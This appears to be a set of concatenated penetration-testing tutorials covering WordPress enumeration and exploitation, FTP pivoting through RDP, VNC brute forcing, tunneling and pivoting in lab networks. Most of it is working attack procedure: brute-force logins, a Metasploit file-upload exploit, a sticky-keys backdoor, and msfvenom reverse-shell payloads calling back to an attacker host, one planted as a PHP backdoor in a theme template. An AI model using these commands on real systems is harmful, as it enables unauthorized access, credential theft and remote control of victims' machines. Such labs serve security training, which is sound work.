Here it found server: Apache/2.4.7, PHP /5.5.9 wordpress version 4.8.1, using this information an attacker can check for its exploit in Google. Moreover it also found that the upload directory has directory listing enable which means anyone can browse the directory /wp-content/uploads to view the uploaded files and contents.

Enumerating wordpress Theme

A theme controls the general look and feel of website including things like page layout, widget locations, and default font and color choices. WordPress.com has a wide range of themes for its user and each theme has an about page that includes features and instructions.

To scan installed theme of wordpress website type following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate t

After some time we successfully found Theme twentysevebteen –v1.3, last update, location of theme installed and etc as shown below.

Enumerating wordpress vulnerable Theme

To scan installed vulnerable theme of wordpress website type following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vt

From scanning result we didn’t find any vulnerable theme which means there is no vulnerable theme which can be exploited.

Enumerating wordpress Plugins

Plugins are small piece of code of a program which can be added to a WordPress website to extend its functionality.

To find installed plugins on our target’s WordPress website, type in terminal:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate p

Finally, after few seconds, you will get result of installed plug-in. You can see that in my scan result askismet v3.3.3, pixabay-images v2.14, wptouch v3.4.3 such types of installed plug-in are detected. As well as it also describe last update and latest version of that plug-in.

Enumerating wordpress vulnerable Plugins

Now type following command to scan vulnerable plug-in of any wordpress website:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vp

After few seconds, you will get result of installed vulnerable plug-in of website. From given image you can observe that the red color indicates vulnerable plug-ins as well as link of exploits CVE.

Exploit vulnerable plug-in using Metasploit

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

Open the terminal load metasploit framework and execute following command:

use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101

msf exploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/

msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From given image you can observe the meterpreter session of victim’s web server.

Meterpreter> sysinfo

Enumerating wordpress Usernames

In order to enumerate user names of wordpress website execute following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerateu

After sometime it will dump the table of usernames. In this scan I had found three users with their Id as given below:

ID 1: admin

ID2: ignite

ID: demo

Enumerate ALL with single command

Whatever we have scanned above can be easily enumerate at once by executing given below command:

./wpscan.rb –u http://192.168.0.101/wordpress/ -e at –e ap –e u

Here we had use option –e at –e ap –e u for following reasons:

–e at : enumerate all themes of targeted website

–e ap: enumerate all plugins of targeted website

–e u: enumerate all usernames of targetd website

Brute force attack using Wpscan

With help of username which we had enumerated above we can create a wordlist of password for user admin and can try brute force login attack using given below command.

./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt –username admin

It will start matching the valid combination of username and password for login and then dump the result, from given image you can see it found login credential of targeted website as admin:password.

Generate PHP backdoor in wordpress

You can use above credential for login into admin panel where we can upload any theme, taking advantage of admin right we will try to upload malicious script to achieve reverse connection from victim’s system.

Once you are inside admin panel click on Appearance from dashboard and then select option editor.

Now select template 404.php given on the right side of the frame; after that you will found some php code in middle frame for 404 temperate. Erasetheentire php code so that you can add malicious php code for generating backdoor inside website as a new theme.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *further we will past it inside wordpress template as a new theme.

Now past above copied PHP text * here as new theme under selected 404.php template.

On other hand Load metasploit framework and start multi/handler

use exploit/multi/handler

msf exploit(handler) >set payload php/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.0.107

msf exploit(handler) >4444

msf exploit(handler) >exploit

When you will execute your uploaded theme 404.php in browser you will receive reverse connection at multi/handler and get meterpreter session of victim’s system.

http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php

Here form screenshot you can see through meterpreter we have access victim’s shell.

Meterpreter> sysinfo

In this way using WPSCAN and METASPLOIT admin can check the strength and weakness of wordpress website.

In our previous tutorial we had discussed on SSH pivoting & RDP pivoting and today you will learn FTP pivoting attack.

From Offensive Security

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine: window operating system with two network interface

Target Machine: window 7 (Allow FTP service)

Exploit pivot machine

Use exploit MS17-010 or multi handler to hack the pivot machine and bypass its UAC to achieve admin privileges.

sessions

From given image you can confirm that I owned pivot machine (192.168.0.101) meterpreter session1.

Launch sticky key attack

Here I need to make post exploit to launch sticky key attack

Use post/windows/manage/sticky_keys

msf post(sticky_keys) > set session 1

msf post(sticky_keys) >exploit

Great!! It has successfully launched sticky attack in pivot machine and now we will utilize it later for establishing connection with target FTP server.

Enable RDP service

Open meterpreter session1 and type following command which will enable remote Desktop service in pivoted machine.

Meterpreter> run getgui -e

Verify network interface of pivot

Check network interface through following command:

Meterpreter> ifconfig

From given image you can observe two networks interface in pivot’s system 1^st for IP 192.168.0.101 through which attacker is connected and 2^nd for IP 192.168.100.102 through which FTP server (targets) are connected.

Use autoroute post exploit

use post/multi/manage/autoroute

msf post(autoroute) > set session 1

msf post(autoroute) > exploit

Use Ping sweep post exploit

This module will perform IPv4 ping sweep using the OS included ping command.

use post/windows/gather/ping_sweep

msf post(ping_sweep) > set rhosts 192.168.100.1-110

msf post(ping_sweep) > set session 1

msf post(ping_sweep) > exploit

Here we found a new host IP 192.1668.100.103 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

Use TCP Port Scanpost exploit

This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set ports 21

msf auxiliary(tcp) > set rhosts 192.168.100.103

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

From given you can observe port 21isopen and we know that 21 used for FTP services.

FTP Login Brute Force

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > set rhosts 192.168.100.103

msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt

msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(ftp_login) > set stop_on_success true

msf auxiliary(ftp_login) > exploit

From given image you can observe t it is showing matching combination of username: raj and password: 123 for login.

Connect to pivot through RDP

Open new terminal in kali Linux and type following command to connect with pivot machine through RDP service

rdesktop 192.168.0.101

If you remember we had lunched sticky attack above which will open command prompt on logon screen when you will hit 5 times shift key.

Now press 5 times shift key then you will get command prompt and type “start iexplore.exe” which will lunch Internet Explore.

Connect with FTP server

Execute following URL in browser for FTP connection:

ftp://192.168.100.103

Now enter the credential which we had found through FTP login brute force attack i.e. raj: 123

Congrats!!! We are successfully connected with FTP server through pivot machine.

Welcome to Internal penetration testing on VNC server where you will learn VNC installation and configuration, enumeration and attack, system security and precaution.

From Wikipedia

Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction. It uses port 5900: VNC and 5901: VNC-1.

Penetration Lab Requirements

VNC Server: ubuntu

Attacker system: Kali Linux

Client system: window (tightVNC view)

Let’s start!!

VNC Installation

Open the terminal and follow the given below steps by executing given command for VNC installation.

Given below command will installs the desktop, Unity, as well as several packages that are required for the graphical interface to work properly.

sudo apt-get install gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal

Now type following command for VNC server installation.

sudo apt-get install vnc4server

Given below command will reset your server password that is required for VNC login

sudo vncpasswd

The password should minimum 6 digits; here I had set server password: 098765 for VNC authentication.

Type given below command to run VNC

sudo vncserver :1

It is required to kill the process if you want to make some changes in running VNC server.

sudo vncserver -kill :1

Now type following command in order to open VNC startup file for making some changes.

sudo gedit ~/.vnc/xstartup

Add given below line in startup file as shown in given and save the changes.

exec gnome-session &

exec gnome-panel &

exec gnome-settings-daemon &

exec metacity &

Execute given below command to set resolution of Desktop screen.

sudo vncserver :1 -geometry 1024x768 -depth 24

After following above 7 steps check service status of VNC server using given below command.

sudo netstat -tnl |grep 5901

From given image you can confirm that port 5901 is activated

Connecting window Client to VNC server

TightVNCis a free remote control software package that help client to connect with VNC server. I have downloadedit in client machine so that he can connect to vnc server.

Run TightVNC Viewer and enter [192.168.1.218:5901] server IP: port number as shown in given image and then click on connect.

Client will get VNC authentication Popup enter the server password which you have set above.

From given image you can observe that window client has connected to ubuntu server and access his Desktop and could control it mouse and keyboard.

Scanning Target IP for Enumeration

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port and protocols.

nmap -sT 192.168.1.218

If service is activated in targeted server then nmap show open STATE for port 5901.

Use nmap script for VNC version

Following nmap command will Queries a VNC server for its protocol version and supported security types.

nmap -p 5901 --script vnc-info 192.168.1.218

From given below image you can conclude that it has shown protocol version 3.8 and security type: VNC authentication 2.

Use nmap script for VNC brute force attack

Following nmap command willPerforms brute force password auditing against VNC server using dictionary for password.

nmap -p 5901 --script vnc-brute 192.168.1.218 --script-args passdb=/root/desktop/pass.txt

Great!! From given below image you can read the valid password: 098765

Use Metasploit for VNC brute force attack

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(vnc_login) >set rhosts 192.168.1.218

msf auxiliary(vnc_login) >set rport 5901

msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt

msf auxiliary(vnc_login) > run

Awesome!! From given below image you can observe the same password: 098765have been found by metasploit.

Attacker connecting VNC server

Open a new terminal and type following command for connecting with VNC server using above password 098765

vncviewer 192.168.1.218:5901

Nice!! You can see after making successfully brute force attack an attacker can easily connect with vnc server.

Capture VNC Session of window Remote system using Msfvenom

Create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.

Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=44455 -f exe > /var/www/html/vnc.exe

Now the above command will generate an exe file for the VNC payload in /var/www/html of Kali Linux.

Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.216

msf exploit(handler) > set lport 4455

msf exploit(handler) > set viewonly false

msf exploit(handler) > run

Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.

Here you can see desktop screen of victim’s pc through will attacker is connected.

Another way toCapture VNC Session of window Remote system

Suppose you have already exploited any window system and got victim’s system reverse connection through meterpreter session.

Type given below command which will inject a VNC Dll via a reflective loader (staged). Connect back to the attacker.

Meterpreter > run vnc

Great!! Again attacker is connected to victim’s system

Secure VNC server through port forwarding

Open vnserver setup file using given blow command:

sudo gedit /usr/bin/vncserver

Follow given below step for making changes

Add # to comment “vncport = 5900”

Add a new line as shown in given image for forwarding VNC service as vncPort = 8800;

Now try to connect with vnc server through port 8800 as connected above through tighvnc viewer and enter the password.

Hence you can see the vnc connection has been established successfully.

In previous article we had perform VNC penetration testingand today you will VNC tunneling to connect remote machine with VNC server when they both belongs different network interface.

Basically tunneling is process which allows data sharing or communication between two different networks privately. Tunneling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data.

Let’s Begin!!

Requiremet:

Server machine(ubuntu): Two network interface with activted SSH service

Local machine (ubuntu): activated VNC service

Remote machine(window): with install tight VNC viewer

In following image we are trying to explain VNC tunneling process where a remote PC of IP 192.168.1.225 is trying to connect to 10.0.0.20 which is on INTRANET of another network. To establish connection with local machine, remote PC will create VNC tunnel which will connect with the local system via SSH server machine.

Given image below is describing the network configuration for server machine (SSH) where it is showing two IP 192.168.1.226 and another 10.0.0.10 as explain above.

Another image given below is describing network configuration for local machinewhich is showing IP 10.0.0.20

Checking activated VNC service using following command:

netstat -tlp

Hence from given image you can see the highlighted text is showing 5900 is enabled in local machine.

Open the terminal and type using following command to connecting to VNC machine (IP: 10.0.0.20) through server machine (IP: 10.0.0.10).

vncviewer 10.0.0.20

Great!! Local machine successfully connected

Similarly Using tight vnc viewer remote machine (192.168.1.225) now trying to connect local machine (IP: 10.0.0.10) as shown in given image

Since they belong to different network therefore he receives network error.

Follow given below step to connect remote machine to local machine via ssh server.

· Open tightVNC connection and enter the local machine IP: 10.0.0.20 with port 5900.

· EnableSSH tunneling

· Now enter ssh server IP: 192.168.1.226 with port 22and ssh server username: ubutnu.

Congrats!!!Remote machine had successfully connected with local machine through VNC.

In privous article we had describe VNC peneration testing and VNC tunneling through SSH but today we are going to demonstrate VNC pivoting.

From Offensive Security

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine: ubuntu operating system with two network interface

Target Machine: ubuntu (Allow VNC service)

Exploit pivot machine

Generate payload using msfvenom start multi/handler to hack the pivot machine (ubuntu) read complete article fromhere and bypass its UAC to achieve admin privileges.

sessions

From given image you can confirm that I owned pivot machine (192.168.1.226) meterpreter session.

Verify network interface of pivot

Check network interface through following command:

Meterpreter> ifconfig

From given image you can observe two networks interface in pivot’s system 1^st for IP 192.168.1.226 through which attacker is connected and 2^nd for IP 10.0.0.1 through which VNC server (targets) are connected.

Use autoroute post exploit

Since attacker belongs to 192.168.1.1 interface and client belongs to 10.0.0.0interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 10.0.0.0 network attacker need run the post exploitation “autoroute”.

use post/multi/manage/autoroute

msf post(autoroute) > set session 3

msf post(autoroute) > exploit

Use ARP Sweep to identify Active host

This module will enumerate alive Hosts in local network using ARP requests. Take help from target network interface 3 as shown above for MAC address and other details.

Use auxiliary/scanner/discovery/arp_sweep

msf auxiliary(arp_sweep) >set rhost 10.0.0.1-254

msf auxiliary(arp_sweep) >set shost

msf auxiliary(arp_sweep) >set smac 00:0c:29:bf:43:94

msf auxiliary(arp_sweep) >run

Here we found a new host IP 10.0.0.20 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

Use TCP Port Scan post exploit

This module will enumerate open TCP port of target system.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhosts 10.0.0.20

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

From given you can observe port 5900 is open and we know that 5900 used for VNC services.

VNC brute force attack

In order to steal password for making unauthorized access in VNC machine apply Brute force attack using password dictionary in given below exploit.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(vnc_login) >set rhosts 10.0.0.20

msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt

msf auxiliary(vnc_login) > run

Awesome!! From given below image you can observe the same password: 123456 have been found by metasploit.

VNC Port forwarding on Local port

Now Type following command for port forwarding on localhost.

Meterpreter> portfwd add –l 6000 –p 5900 –r 10.0.0.20

-l: This is a local port to listen on.

-p: The remote port to connect on.

-r: The remote host address to connect on.

Now open the terminal and type following command to connect target machine:

vncviewer 127.0.0.1:6000

Wonderful!! We had successfully exploit VNC client by making unauthorized access.

How to Setup Mail Server for Penetration Testing using hMail

Penetration Testing on Remote Desktop (Port 3389)

FTP Penetration Testing on Windows

FTP Penetration Testing in Ubuntu

RDP Pivoting with Metasploit

Step by Step SMTP Lab Setup in Ubuntu

Hack the IMF VM (CTF Challenge)

Hack the thewall VM (CTF Challenge)

MySQL Penetration Testing with NMAP

Penetration Testing on MYSQL (Port 3306)

Penetration Testing on Telnet (Port 23)

4 ways to SMTP Enumeration

Log Poisoning through LFI

Hack the Primer VM (CTF Challenge)

RCE with LFI and SSH Log Poisoning

Wordpress Penetration testing using WPScan & Metasploit

FTP Pivoting through RDP

VNC Penetration Testing

VNC tunneling over SSH

VNC Pivoting through Meterpreter

Verify network interface of pivot

Use autoroute post exploit

Use TCP Port Scan post exploit

VNC brute force attack